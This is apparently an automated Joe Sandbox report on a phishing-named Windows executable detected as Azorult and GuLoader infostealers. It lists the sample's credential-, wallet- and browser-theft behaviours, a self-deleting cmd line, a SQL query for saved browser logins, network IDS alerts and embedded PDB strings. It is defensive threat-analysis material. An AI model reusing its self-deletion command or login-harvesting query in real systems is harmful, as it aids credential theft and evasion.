Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO No. 3200005919.exe

Overview

General Information

Sample Name:PO No. 3200005919.exe
Analysis ID:755357
MD5:9453cdcf8221341d06bac47b8ab3aa19
SHA1:c35a23cdc61eb42594e1a39a23ccae06399263c0
SHA256:7490acc48d1659234d61c1716c0d549880a98375f502502b60dcc71b49f7f14f
Infos:

Detection

Azorult, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
Tries to harvest and steal Bitcoin Wallet information
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • PO No. 3200005919.exe (PID: 6564 cmdline: C:\Users\user\Desktop\PO No. 3200005919.exe MD5: 9453CDCF8221341D06BAC47B8AB3AA19)
    • PO No. 3200005919.exe (PID: 5920 cmdline: C:\Users\user\Desktop\PO No. 3200005919.exe MD5: 9453CDCF8221341D06BAC47B8AB3AA19)
      • cmd.exe (PID: 3152 cmdline: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 580 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.7268634345.000000001D92C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000005.00000002.7257083339.000000001D3C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000005.00000000.6901415186.0000000001660000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
                • 0x32285c:$string1: SELECT origin_url, username_value, password_value FROM logins
                • 0x3269b7:$string1: SELECT origin_url, username_value, password_value FROM logins
                • 0x197172:$string2: API call with %s database connection pointer
                • 0x197da6:$string3: os_win.c:%d: (%lu) %s(%s) - %s
                5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                    Click to see the 4 entries
                    No Sigma rule has matched
                    Timestamp:192.168.11.20104.21.2.649830802029468 11/28/22-16:37:02.608409
                    SID:2029468
                    Source Port:49830
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:104.21.2.6192.168.11.2080498302029137 11/28/22-16:37:03.671390
                    SID:2029137
                    Source Port:80
                    Destination Port:49830
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: PO No. 3200005919.exeReversingLabs: Detection: 61%
                    Source: PO No. 3200005919.exeVirustotal: Detection: 47%Perma Link
                    Source: PO No. 3200005919.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: PO No. 3200005919.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197956244.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164106750.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr
                    Source: Binary string: ucrtbase.pdb source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.5.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193561822.000000001E624000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.5.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7155669494.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7144272032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.5.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.5.dr
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7150187588.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.5.dr
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7280858464.000000001E270000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139597928.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7162881339.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7163552141.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158930983.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158247147.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158985607.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr
                    Source: Binary string: qipcap.pdb source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr
                    Source: Binary string: msvcp140.i386.pdb source: PO No. 3200005919.exe, 00000005.00000003.7207591372.000000001D9A8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.5.dr
                    Source: Binary string: ucrtbase.pdbUGP source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.5.dr
